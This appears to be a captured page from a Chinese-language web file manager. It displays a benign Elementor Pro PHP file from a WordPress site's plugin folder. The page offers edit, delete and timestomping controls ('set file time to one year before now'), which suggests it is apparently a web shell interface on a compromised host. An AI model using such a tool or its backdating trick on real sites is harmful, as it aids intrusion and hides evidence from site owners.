文件操作 - php-api.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/rokpawnew/public_html/wp-content/plugins/elementor-pro/core/php-api.php
编辑文件内容
<?php namespace ElementorPro\Core; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * This class is responsible for the interaction with PHP Core API. * The main benefit is making it easy to mock in testing. */ class PHP_Api { /** * @param $from * @param $to * * @return bool */ public function move_uploaded_file( $from, $to ) { return @ move_uploaded_file( $from, $to ); } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件